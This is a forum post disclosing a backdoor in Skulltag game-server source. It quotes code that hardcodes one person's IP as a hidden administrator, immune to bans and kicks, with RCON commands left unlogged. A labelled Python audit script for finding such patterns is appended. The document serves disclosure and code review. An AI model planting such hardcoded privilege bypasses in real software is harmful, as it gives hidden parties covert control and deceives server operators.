mandax
Warming Up
Posts: 13
Registered: 02-11
Firstly: I'm a long-time Skulltag player. I love ST and I want to continue to play it; therefore I would like to remain anonymous.
Consider this post an act of whistleblowing that will hopefully help improve the port in the end.
Some of you might remember the csDoom backdoor incident. The creator of csDoom (Fly) added a backdoor to the server binaries which would grant him RCON rights on any server.
A similar backdoor was implemented by Carnevil, as can be seen in the recently released 0.97c2 source code.
sv_admin.cpp:
Here we can see Carnevil's hardcoded IP address and a function that will return true if a given address is included in the Adminlist! Note that this code was written with expandability in mind.
code:
    void SERVER_ADMIN_Construct( void )
    {
        g_AdminList[ADMIN_CARNEVIL].Address.ip[0] = 24;
        g_AdminList[ADMIN_CARNEVIL].Address.ip[1] = 242;
        g_AdminList[ADMIN_CARNEVIL].Address.ip[2] = 214;
        g_AdminList[ADMIN_CARNEVIL].Address.ip[3] = 13;
    }

    bool SERVER_ADMIN_IsAdministrator( netadr_t Address )
    {
        ULONG ulIdx;

        for ( ulIdx = 0; ulIdx < NUM_ADMINS; ulIdx++ )
        {
            if ( NETWORK_CompareAddress( g_AdminList[ulIdx].Address, Address, true ))
                return ( true );
        }

        return ( false );
    }
Let us have a look where this function is used and what IP addresses listed in the secret Adminlist can do:
All of the following code is from sv_main.cpp:
They cannot be banned from the server!
code:
    if (( sv_enforcebans ) && ( SERVERBAN_IsIPBanned( szAddress[0], szAddress[1], szAddress[2], szAddress[3] ))
        && ( SERVER_ADMIN_IsAdministrator( clients[lClient].address ) == false ))
    {
        // Client has been banned! GET THE FUCK OUT OF HERE!
        SERVER_ClientError( lClient, NETWORK_ERRORCODE_BANNED );
        return;
    }
They can issue "silent" RCON commands that will not be printed.
code:
    // If they don't have RCON access, and aren't an adminstrator, deny them the ability to do this.
    if (( clients[parse_cl].bRCONAccess == false ) && ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false ))
        return ( false );

    // Admins can operate incognito.
    if ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false )
        Printf( "%s RCON (%s)\n", players[parse_cl].userinfo.netname, pszCommand );
They cannot be kicked from the game or server!
code:
    if ( stricmp( szPlayerName, argv[1] ) == 0 )
    {
        if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
            continue;

        // If we provided a reason, give it.
        if ( argv.argc( ) >= 3 )
            SERVER_KickPlayer( ulIdx, argv[2] );
        else
            SERVER_KickPlayer( ulIdx, "None given." );
        return;
    }
code:
    if ( stricmp( szPlayerName, argv[1] ) == 0 )
    {
        if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
            continue;

        // Already a spectator!
        if ( PLAYER_IsTrueSpectator( &players[parse_cl] ))
            continue;

        // If we provided a reason, give it.
        if ( argv.argc( ) >= 3 )
            SERVER_KickPlayerFromGame( ulIdx, argv[2] );
        else
            SERVER_KickPlayerFromGame( ulIdx, "None given" );
        return;
    }
All of the above probably applies to ScoreDoomST, which is based on 0.97c2, as well.
Now this backdoor might or might not be present in the current ST source code.
What caught my eye though in the recent changelog was the implementation of a server-side whitelist and adminlist, with similar functionality, meant for server hosts only. For more details check out the Wiki.
The Skulltag master-server is distributing a global banlist to all servers. As this and this post suggest, a global whitelist is distributed as well.
Now what if all the server-side lists have been implemented at the global level and the master-server is also distributing a secret adminlist to all servers (maybe the global adminlist IP checks are done directly on the master though)?
If a backdoor of any kind is still present it would be a huge security risk and massive breach of trust between server hosts and the ST administration.
Someone who is skilled in Reverse Engineering might want to check the current server master communication for a 'third list' or other suspicious queries to confirm my worries.
An official statement from the administration confirming or disputing the existence of a "master adminlist" or any other form of backdoor could clear things up.
Since Skulltag is closed source we ultimately have to trust the official statement from the administration.
Releasing older source code so we can at least see since when the backdoor was present would be a first step.
I guess this incident will make the administration cautious to remove incriminating code from future source code releases though. Some viable options to regain trust would be to go fully open source or allow some neutral members from the DooM community to review the code in person by visiting one of the developers IRL.
I know that some prominent figures from the Doom community, like AlexMax, Ladna, Gez and Graf Zahl, are actively pushing for Skulltag to be open sourced.
Ladna said it best in the previously linked altdeath thread:
ST keeping a current, open-source version would at least prevent something like the current situation with ZDaemon by allowing us the "fuck you jerks" option.
He is absolutely right! The players should have all the power. The programmers should just do their job and write code instead. If the programmers or admins try to deceive the players the project can be forked easily!
I would be very pleased if ST became a truly free port like Odamex and they could finally share code and join forces!
Maybe this negative incident here can be turned into something positive and accelerate that process.
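An added example, not part of the original post and not Skulltag code: a small Python audit pass that a reviewer could run over a source release to surface the pattern described above, by rebuilding IP addresses that are assigned octet by octet and listing every line where a given identity check feeds a privilege decision. The names `hardcoded_addresses`, `call_sites` and `SAMPLE` are made up for this example; the sample lines are copied from the excerpts quoted in the post.

```python
import re
from collections import defaultdict

# Constructed sample: the lines below are taken from the excerpts quoted in the post.
SAMPLE = {
    "sv_admin.cpp": """\
g_AdminList[ADMIN_CARNEVIL].Address.ip[0] = 24;
g_AdminList[ADMIN_CARNEVIL].Address.ip[1] = 242;
g_AdminList[ADMIN_CARNEVIL].Address.ip[2] = 214;
g_AdminList[ADMIN_CARNEVIL].Address.ip[3] = 13;
""",
    "sv_main.cpp": """\
if (( sv_enforcebans ) && ( SERVERBAN_IsIPBanned( szAddress[0], szAddress[1], szAddress[2], szAddress[3] ))
&& ( SERVER_ADMIN_IsAdministrator( clients[lClient].address ) == false ))
if (( clients[parse_cl].bRCONAccess == false ) && ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false ))
if ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false )
if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
""",
}

# Matches "<target>.ip[<0-3>] = <number>;", the octet-by-octet form used in sv_admin.cpp.
OCTET = re.compile(r"(?P<target>[\w\[\].]+?)\.ip\[(?P<idx>[0-3])\]\s*=\s*(?P<val>\d{1,3})\s*;")


def hardcoded_addresses(sources):
    """Rebuild IPv4 literals that are assigned one octet at a time."""
    octets = defaultdict(dict)
    for name, text in sources.items():
        for m in OCTET.finditer(text):
            octets[(name, m["target"])][int(m["idx"])] = int(m["val"])
    # Report only targets with all four octets present and in range.
    return {key: ".".join(str(parts[i]) for i in range(4))
            for key, parts in octets.items()
            if len(parts) == 4 and max(parts.values()) <= 255}


def call_sites(sources, function):
    """Return (file, line number, text) for every line that names `function`."""
    call = re.compile(r"\b" + re.escape(function) + r"\s*\(")
    return [(name, no, line.strip())
            for name, text in sources.items()
            for no, line in enumerate(text.splitlines(), 1)
            if call.search(line)]


if __name__ == "__main__":
    for (name, target), ip in hardcoded_addresses(SAMPLE).items():
        print(f"{name}: {target} is hardcoded to {ip}")
    for name, no, line in call_sites(SAMPLE, "SERVER_ADMIN_IsAdministrator"):
        print(f"{name}:{no}: review privilege decision: {line}")
```

Each reported call site is a place where ban, kick or RCON logging behaviour changes for an address the server operator did not configure, which is what a reviewer needs to read by hand.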